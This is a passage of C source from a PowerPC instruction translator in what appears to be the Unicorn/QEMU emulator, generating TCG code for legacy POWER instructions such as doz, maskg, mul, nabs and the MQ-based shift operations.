gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); /* Start with XER OV disabled, the most likely case */ tcg_gen_movi_tl(tcg_ctx, cpu_ov, 0); tcg_gen_brcond_tl(tcg_ctx, TCG_COND_GE, cpu_gpr[rB(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], l1); tcg_gen_sub_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); tcg_gen_xor_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); tcg_gen_xor_tl(tcg_ctx, t2, cpu_gpr[rA(ctx->opcode)], t0); tcg_gen_andc_tl(tcg_ctx, t1, t1, t2); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l2); tcg_gen_movi_tl(tcg_ctx, cpu_ov, 1); tcg_gen_movi_tl(tcg_ctx, cpu_so, 1); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_movi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], 0); gen_set_label(tcg_ctx, l2); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* dozi */ static void gen_dozi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_long simm = SIMM(ctx->opcode); TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_LT, cpu_gpr[rA(ctx->opcode)], simm, l1); tcg_gen_subfi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], simm, cpu_gpr[rA(ctx->opcode)]); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_movi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], 0); gen_set_label(tcg_ctx, l2); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* lscbx - lscbx. */ static void gen_lscbx(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv_i32 t1 = tcg_const_i32(tcg_ctx, rD(ctx->opcode)); TCGv_i32 t2 = tcg_const_i32(tcg_ctx, rA(ctx->opcode)); TCGv_i32 t3 = tcg_const_i32(tcg_ctx, rB(ctx->opcode)); gen_addr_reg_index(ctx, t0); gen_helper_lscbx(tcg_ctx, t0, tcg_ctx->cpu_env, t0, t1, t2, t3); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); tcg_gen_andi_tl(tcg_ctx, cpu_xer, cpu_xer, ~0x7F); tcg_gen_or_tl(tcg_ctx, cpu_xer, cpu_xer, t0); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, t0); } tcg_temp_free(tcg_ctx, t0); } /* maskg - maskg. 
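 * maskg generates a mask of ones delimited by the bit positions taken from
 * the low five bits of rS and rB: the XOR of the two right-shifted all-ones
 * patterns below yields the ones between the two positions, and the result
 * is negated when the positions arrive in the wrapped order.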
*/ static void gen_maskg(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); TCGv t3 = tcg_temp_new(tcg_ctx); tcg_gen_movi_tl(tcg_ctx, t3, 0xFFFFFFFF); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_andi_tl(tcg_ctx, t1, cpu_gpr[rS(ctx->opcode)], 0x1F); tcg_gen_addi_tl(tcg_ctx, t2, t0, 1); tcg_gen_shr_tl(tcg_ctx, t2, t3, t2); tcg_gen_shr_tl(tcg_ctx, t3, t3, t1); tcg_gen_xor_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t2, t3); tcg_gen_brcond_tl(tcg_ctx, TCG_COND_GE, t0, t1, l1); tcg_gen_neg_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rA(ctx->opcode)]); gen_set_label(tcg_ctx, l1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); tcg_temp_free(tcg_ctx, t3); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* maskir - maskir. */ static void gen_maskir(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_and_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); tcg_gen_andc_tl(tcg_ctx, t1, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); tcg_gen_or_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* mul - mul. */ static void gen_mul(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); tcg_gen_extu_tl_i64(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); tcg_gen_extu_tl_i64(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)]); tcg_gen_mul_i64(tcg_ctx, t0, t0, t1); tcg_gen_trunc_i64_tl(tcg_ctx, t2, t0); gen_store_spr(tcg_ctx, SPR_MQ, t2); tcg_gen_shri_i64(tcg_ctx, t1, t0, 32); tcg_gen_trunc_i64_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t1); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* mulo - mulo. */ static void gen_mulo(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); /* Start with XER OV disabled, the most likely case */ tcg_gen_movi_tl(tcg_ctx, cpu_ov, 0); tcg_gen_extu_tl_i64(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); tcg_gen_extu_tl_i64(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)]); tcg_gen_mul_i64(tcg_ctx, t0, t0, t1); tcg_gen_trunc_i64_tl(tcg_ctx, t2, t0); gen_store_spr(tcg_ctx, SPR_MQ, t2); tcg_gen_shri_i64(tcg_ctx, t1, t0, 32); tcg_gen_trunc_i64_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t1); tcg_gen_ext32s_i64(tcg_ctx, t1, t0); tcg_gen_brcond_i64(tcg_ctx, TCG_COND_EQ, t0, t1, l1); tcg_gen_movi_tl(tcg_ctx, cpu_ov, 1); tcg_gen_movi_tl(tcg_ctx, cpu_so, 1); gen_set_label(tcg_ctx, l1); tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* nabs - nabs. 
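 * nabs computes the negative absolute value, rD = -|rA|. Every input has a
 * representable result, so the operation can never overflow; that is why
 * the 'o' form below simply forces XER[OV] to zero.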
*/ static void gen_nabs(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv d = cpu_gpr[rD(ctx->opcode)]; TCGv a = cpu_gpr[rA(ctx->opcode)]; tcg_gen_abs_tl(tcg_ctx, d, a); tcg_gen_neg_tl(tcg_ctx, d, d); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, d); } } /* nabso - nabso. */ static void gen_nabso(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv d = cpu_gpr[rD(ctx->opcode)]; TCGv a = cpu_gpr[rA(ctx->opcode)]; tcg_gen_abs_tl(tcg_ctx, d, a); tcg_gen_neg_tl(tcg_ctx, d, d); /* nabs never overflows */ tcg_gen_movi_tl(tcg_ctx, cpu_ov, 0); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, d); } } /* rlmi - rlmi. */ static void gen_rlmi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t mb = MB(ctx->opcode); uint32_t me = ME(ctx->opcode); TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_rotl_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t0); tcg_gen_andi_tl(tcg_ctx, t0, t0, MASK(mb, me)); tcg_gen_andi_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], ~MASK(mb, me)); tcg_gen_or_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], t0); tcg_temp_free(tcg_ctx, t0); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* rrib - rrib. */ static void gen_rrib(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_movi_tl(tcg_ctx, t1, 0x80000000); tcg_gen_shr_tl(tcg_ctx, t1, t1, t0); tcg_gen_shr_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t0); tcg_gen_and_tl(tcg_ctx, t0, t0, t1); tcg_gen_andc_tl(tcg_ctx, t1, cpu_gpr[rA(ctx->opcode)], t1); tcg_gen_or_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* sle - sle. */ static void gen_sle(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_shl_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t1); tcg_gen_subfi_tl(tcg_ctx, t1, 32, t1); tcg_gen_shr_tl(tcg_ctx, t1, cpu_gpr[rS(ctx->opcode)], t1); tcg_gen_or_tl(tcg_ctx, t1, t0, t1); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0); gen_store_spr(tcg_ctx, SPR_MQ, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* sleq - sleq. */ static void gen_sleq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_movi_tl(tcg_ctx, t2, 0xFFFFFFFF); tcg_gen_shl_tl(tcg_ctx, t2, t2, t0); tcg_gen_rotl_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t0); gen_load_spr(tcg_ctx, t1, SPR_MQ); gen_store_spr(tcg_ctx, SPR_MQ, t0); tcg_gen_and_tl(tcg_ctx, t0, t0, t2); tcg_gen_andc_tl(tcg_ctx, t1, t1, t2); tcg_gen_or_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* sliq - sliq. 
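 * The 'q' suffix on the POWER shift instructions means MQ participates:
 * sliq shifts rS left by the immediate amount into rA while the full
 * rotated value is kept in MQ.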
*/ static void gen_sliq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int sh = SH(ctx->opcode); TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_shli_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], sh); tcg_gen_shri_tl(tcg_ctx, t1, cpu_gpr[rS(ctx->opcode)], 32 - sh); tcg_gen_or_tl(tcg_ctx, t1, t0, t1); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0); gen_store_spr(tcg_ctx, SPR_MQ, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* slliq - slliq. */ static void gen_slliq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int sh = SH(ctx->opcode); TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_rotli_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], sh); gen_load_spr(tcg_ctx, t1, SPR_MQ); gen_store_spr(tcg_ctx, SPR_MQ, t0); tcg_gen_andi_tl(tcg_ctx, t0, t0, (0xFFFFFFFFU << sh)); tcg_gen_andi_tl(tcg_ctx, t1, t1, ~(0xFFFFFFFFU << sh)); tcg_gen_or_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* sllq - sllq. */ static void gen_sllq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGv t0 = tcg_temp_local_new(tcg_ctx); TCGv t1 = tcg_temp_local_new(tcg_ctx); TCGv t2 = tcg_temp_local_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t2, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_movi_tl(tcg_ctx, t1, 0xFFFFFFFF); tcg_gen_shl_tl(tcg_ctx, t1, t1, t2); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x20); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, t0, 0, l1); gen_load_spr(tcg_ctx, t0, SPR_MQ); tcg_gen_and_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t1); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_shl_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t2); gen_load_spr(tcg_ctx, t2, SPR_MQ); tcg_gen_andc_tl(tcg_ctx, t1, t2, t1); tcg_gen_or_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t1); gen_set_label(tcg_ctx, l2); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* slq - slq. */ static void gen_slq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_shl_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t1); tcg_gen_subfi_tl(tcg_ctx, t1, 32, t1); tcg_gen_shr_tl(tcg_ctx, t1, cpu_gpr[rS(ctx->opcode)], t1); tcg_gen_or_tl(tcg_ctx, t1, t0, t1); gen_store_spr(tcg_ctx, SPR_MQ, t1); tcg_gen_andi_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)], 0x20); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, t1, 0, l1); tcg_gen_movi_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], 0); gen_set_label(tcg_ctx, l1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* sraiq - sraiq. 
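 * sraiq is the algebraic (sign-propagating) variant with MQ update: the
 * rotated source is saved in MQ, and XER[CA] is set only when the source is
 * negative and non-zero bits are shifted out, which is what the two
 * conditional branches below implement.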
*/ static void gen_sraiq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int sh = SH(ctx->opcode); TCGLabel *l1 = gen_new_label(tcg_ctx); TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], sh); tcg_gen_shli_tl(tcg_ctx, t1, cpu_gpr[rS(ctx->opcode)], 32 - sh); tcg_gen_or_tl(tcg_ctx, t0, t0, t1); gen_store_spr(tcg_ctx, SPR_MQ, t0); tcg_gen_movi_tl(tcg_ctx, cpu_ca, 0); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, t1, 0, l1); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, cpu_gpr[rS(ctx->opcode)], 0, l1); tcg_gen_movi_tl(tcg_ctx, cpu_ca, 1); gen_set_label(tcg_ctx, l1); tcg_gen_sari_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], sh); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* sraq - sraq. */ static void gen_sraq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_local_new(tcg_ctx); TCGv t2 = tcg_temp_local_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t2, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_shr_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t2); tcg_gen_sar_tl(tcg_ctx, t1, cpu_gpr[rS(ctx->opcode)], t2); tcg_gen_subfi_tl(tcg_ctx, t2, 32, t2); tcg_gen_shl_tl(tcg_ctx, t2, cpu_gpr[rS(ctx->opcode)], t2); tcg_gen_or_tl(tcg_ctx, t0, t0, t2); gen_store_spr(tcg_ctx, SPR_MQ, t0); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x20); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, t0, 0, l1); tcg_gen_mov_tl(tcg_ctx, t2, cpu_gpr[rS(ctx->opcode)]); tcg_gen_sari_tl(tcg_ctx, t1, cpu_gpr[rS(ctx->opcode)], 31); gen_set_label(tcg_ctx, l1); tcg_temp_free(tcg_ctx, t0); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t1); tcg_gen_movi_tl(tcg_ctx, cpu_ca, 0); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_GE, t1, 0, l2); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, t2, 0, l2); tcg_gen_movi_tl(tcg_ctx, cpu_ca, 1); gen_set_label(tcg_ctx, l2); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* sre - sre. */ static void gen_sre(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_shr_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t1); tcg_gen_subfi_tl(tcg_ctx, t1, 32, t1); tcg_gen_shl_tl(tcg_ctx, t1, cpu_gpr[rS(ctx->opcode)], t1); tcg_gen_or_tl(tcg_ctx, t1, t0, t1); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0); gen_store_spr(tcg_ctx, SPR_MQ, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* srea - srea.
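 * srea shifts rS right algebraically by the amount in rB and keeps the
 * rotated source in MQ, so the bits shifted out remain available there.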
*/ static void gen_srea(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_rotr_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t1); gen_store_spr(tcg_ctx, SPR_MQ, t0); tcg_gen_sar_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* sreq */ static void gen_sreq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); TCGv t2 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_movi_tl(tcg_ctx, t1, 0xFFFFFFFF); tcg_gen_shr_tl(tcg_ctx, t1, t1, t0); tcg_gen_rotr_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t0); gen_load_spr(tcg_ctx, t2, SPR_MQ); gen_store_spr(tcg_ctx, SPR_MQ, t0); tcg_gen_and_tl(tcg_ctx, t0, t0, t1); tcg_gen_andc_tl(tcg_ctx, t2, t2, t1); tcg_gen_or_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t2); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* sriq */ static void gen_sriq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int sh = SH(ctx->opcode); TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_shri_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], sh); tcg_gen_shli_tl(tcg_ctx, t1, cpu_gpr[rS(ctx->opcode)], 32 - sh); tcg_gen_or_tl(tcg_ctx, t1, t0, t1); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0); gen_store_spr(tcg_ctx, SPR_MQ, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* srliq */ static void gen_srliq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; int sh = SH(ctx->opcode); TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_rotri_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], sh); gen_load_spr(tcg_ctx, t1, SPR_MQ); gen_store_spr(tcg_ctx, SPR_MQ, t0); tcg_gen_andi_tl(tcg_ctx, t0, t0, (0xFFFFFFFFU >> sh)); tcg_gen_andi_tl(tcg_ctx, t1, t1, ~(0xFFFFFFFFU >> sh)); tcg_gen_or_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* srlq */ static void gen_srlq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); TCGLabel *l2 = gen_new_label(tcg_ctx); TCGv t0 = tcg_temp_local_new(tcg_ctx); TCGv t1 = tcg_temp_local_new(tcg_ctx); TCGv t2 = tcg_temp_local_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t2, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_movi_tl(tcg_ctx, t1, 0xFFFFFFFF); tcg_gen_shr_tl(tcg_ctx, t2, t1, t2); tcg_gen_andi_tl(tcg_ctx, t0, cpu_gpr[rB(ctx->opcode)], 0x20); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, t0, 0, l1); gen_load_spr(tcg_ctx, t0, SPR_MQ); tcg_gen_and_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t2); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); tcg_gen_shr_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t2); tcg_gen_and_tl(tcg_ctx, t0, t0, t2); gen_load_spr(tcg_ctx, t1, SPR_MQ); tcg_gen_andc_tl(tcg_ctx, t1, t1, t2); tcg_gen_or_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0, t1); gen_set_label(tcg_ctx, l2); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t2); if 
(unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* srq */ static void gen_srq(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGLabel *l1 = gen_new_label(tcg_ctx); TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)], 0x1F); tcg_gen_shr_tl(tcg_ctx, t0, cpu_gpr[rS(ctx->opcode)], t1); tcg_gen_subfi_tl(tcg_ctx, t1, 32, t1); tcg_gen_shl_tl(tcg_ctx, t1, cpu_gpr[rS(ctx->opcode)], t1); tcg_gen_or_tl(tcg_ctx, t1, t0, t1); gen_store_spr(tcg_ctx, SPR_MQ, t1); tcg_gen_andi_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)], 0x20); tcg_gen_mov_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], t0); tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, t1, 0, l1); tcg_gen_movi_tl(tcg_ctx, cpu_gpr[rA(ctx->opcode)], 0); gen_set_label(tcg_ctx, l1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rA(ctx->opcode)]); } } /* PowerPC 602 specific instructions */ /* dsa */ static void gen_dsa(DisasContext *ctx) { /* XXX: TODO */ gen_inval_exception(ctx, POWERPC_EXCP_INVAL_INVAL); } /* esa */ static void gen_esa(DisasContext 